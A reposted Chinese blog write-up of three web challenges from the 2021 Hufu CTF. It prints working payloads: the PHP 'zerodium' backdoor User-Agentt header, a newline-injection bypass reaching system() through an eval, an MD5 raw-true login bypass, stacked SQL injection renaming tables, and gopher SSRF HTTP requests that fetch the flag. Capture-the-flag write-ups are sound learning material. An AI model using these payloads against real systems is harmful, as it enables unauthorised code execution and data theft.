小言_互联网的博客

2021虎符CTF-Web前三题

303人阅读  评论(0)

web

签到

一个最近刚爆出来的php后门,直接一把梭

User-Agentt: zerodiumsystem("cat /flag");

unset

一开始百度搜一下发现是fatfree框架,然后github一瞬间获取源码,本地搭建发现报错嘻嘻

syntax error, unexpected '.', expecting :: (T_PAAMAYIM_NEKUDOTAYIM) [G:\phpstudy_pro\WWW\yyds.top\lib\base.php(530) : eval()'d code:1]

在eval前加了个echo发现真的调用连,

unset($this->hive['后面是我们a=的内容

发现有过滤太长了吧,自己本独测试发现有phpinfo但是后面执行命令不行

a=a[%27phpinfo%27()]

尝试执行

?a=a[%27system%27(ls)]

但是多了空格不行换个思路

尝试php几种常用bypass,日常fuzz发现%0a加上直接成功闭合还能绕过后面过滤,然后芜湖起飞,闭合前面中间任意执行绕过过滤注释后面

?a=1%0a);system('cat /flag');//

慢慢做管理系统

MD5-true的登录过滤前面用后面

ffifdyop和129581926211651571912466741651878684928

进去后我各种姿势失败

username=0';show tables;%23&password=1

之后

username=admin';show columns from real_admin_here_do_you_find ;#&password=a

尝试很多堆叠注入姿势失败,prepare和set也不能同时出现

发现可以改表名

rename tables fake_admin to fuck ; rename tables real_admin_here_do_you_find to fake_admin ;

然后的都

admin密码是5fb4e07de914cfc82afb44vbaf402203

然后用gopher发送下面这个获取cookie后

POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

username=admin&password=5fb4e07de914cfc82afb44vbaf402203

再发

GET /flag.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=c3bv46re495tugnt3vegmo25d2;

页面即可获得flag,做完这题人累死了哭哭


转载:https://blog.csdn.net/solitudi/article/details/115425706
查看评论
* 以上用户言论只代表其个人观点,不代表本网站的观点或立场